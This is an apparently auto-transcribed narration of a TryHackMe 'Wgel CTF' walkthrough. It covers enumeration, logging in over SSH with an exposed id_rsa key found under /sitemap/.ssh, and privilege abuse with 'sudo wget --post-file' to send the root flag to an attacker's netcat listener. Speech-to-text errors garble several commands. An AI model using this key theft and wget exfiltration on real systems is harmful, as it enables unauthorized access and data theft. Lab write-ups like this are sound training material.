Hey, what's going on? Today we're going to be taking a look at Wgel CTF. So Wgel CTF is on Tryhackme. It's rated as an easy. Here's the IP, well, for me. So yeah, I've already completed this box, so it was very easy. I mean, even a complete beginner I think could do this, but I thought the progress was interesting. It isn't one that I've seen before, so that's the reason I'm doing this video. So first things we're going to do is running GoBuster-dir-u for, actually no, let's start with an nmap. So -sc for default scripts, -sv for server, service enumeration, I meant not server enumeration. So we're just going to wait for this to run. While we're at it, we're going to assume that there is a web server. We're just going to run GoBuster. So dir for directory mode, -u for URL. You want to enter the IP, then -w for word list, and then you want to select your word list. So we have /sitemap. So we just leave it like that. So we have SSH, OpenSSH 7.2 P2. Have AT open for HTTP. So I'm not sure if there is a user enumeration for that version of SSH. So OpenSSH 7.2 was it? Yeah, P2. User enumeration. So it looks like there are. So there is obviously. So if we need this, then we have that on hand. Then we have the web server, HTTP, Apache HTTP D 2.4.18. I'm just going to also Google for a vulnerability in that. I just like to do this now because CVs. So I doubt there will be, but you never know. Apache 2.4.18 exploit. We're only interested in, so that's local privilege escalation. Alright, so yeah, I don't see anything. Okay, yeah, so there you go. I don't see anything that we could use to exploit this. Like, there is that local privilege, but yeah. So let's go check out the server, see what's running on there. So we have a default Apache page, which we obviously see here. So what I like to do when I see stuff like this is check the source before looking at my, GoBuster results. Just in case there's any hidden things, if there is, it normally be commented. I forgot what the real word is for this, but I'm gonna just say commented. We have that right there, which isn't, yeah, that isn't anything. Jesse, so we may have a user called Jesse. So we can remember that, and that says don't forget to update the website. So now what we know is a few things. So we're gonna go to /sitemap. We have a template here, a default template. So we can click get premium, that takes us to gallery, not much there. We have a hashtag, maybe we can browse through pages using that. No. have, it's kind of static, like there isn't much functionality here. It is just a default template. We have a shop. Maybe we can go on to this. Alright, no, so we can try the contact, ask for a name, just do Jake, Jake at jake.com, Jake, and then we just add like IMGS+3 and if we just send this message, we see it gets reflected in the URL bar, so which is kind of interesting. So maybe like we can do like some basic LFI testing, etc/password. So we don't see anything. We can check the JavaScript console just to make sure they ain't hiding anything in there being loaded. No, it's just trying to load Google Map. Okay, so next thing we're going to run is dab. So just dab HTTP VIP/sitemap, which finds /.ssh, so we can go there. .ssh. We see something called IDRSA, and in there we have an IDRSA. So we can stop this. I'm going to cd to my home. Gonna nano IDRSA. Gonna chmod 600. And then we're gonna sh -i IDRSA. Oh, I forgot that I have that copied. 10.10.252.8. Yes. So that's obviously connecting as root, so we didn't specify a password, which we need a password for. So in this case, we could try that Jesse user. If we just specify Jesse at, we've already trusted the fingerprint, and there we go, we're logged in. So I'm actually going to use a different terminal here, because Kitty, which is the terminal, okay, Kitty is a terminal that I've been using lately, but it doesn't have, like, so if you try see right here, if I type clear, it says this, and it gets annoying. So gonna cd heap sh-i IDRSA 10.10, what is it, 252.8. So here we just replace this. Actually, you know what, we just replace that. So if we cd to desktop, there's nothing. So if we cd to maybe like him, there's obviously Jesse, which is the only user. If we cd documents, we see the user.text. So you can cap that. To note, they've added a _flag.txt, so other flags may not just be root.txt, user flag.txt, etc. So you can cap that. I'm not going to. Now, next thing we want to do is run sudo-l to see if, how we can run stuff as sudo. So we can run wget. Now we can see if there's a exploit on this. I'm not sure if that is like to allow root, but I only know one way. I'm sure there's others. Also, another thing to mention is they're running I believe it's a vulnerable version of sudo. right here. But I believe, don't take my word for that. If there is, I'm sure you can use this sudo exploit on that. We see issue ID, so that's the issue ID bit. That's just getting files, which we already know we can do. So right here we can use a thing called post file, which allows us to send files and receive them on the attacker's end, our end. So if we netcat LVP, I believe that syntax means listen, verbose, and port. The port we're going to be using is 80, and we're just going to be writing that to root.txt. Now if we, actually I need to ifconfig, oh my gosh, my box is lagging, turn 0. Now if we wget --post--file equals /root.txt, then we need the IP address. Oh, we forgot to run that as sudo. Well, I forgot to. Just run that as sudo. No such file, so we can try flag, and this gets a thingy. We can send commands, but that doesn't reflect any. Now we have this thing called root.txt. If we cat root.txt, that is the root flag. Also along with the post request and yeah, the other headers. So there you go. Very easy box, but interesting way to get the root flag, in my opinion. I hope this was a good video. Have a good day, and I'll catch you in a bit.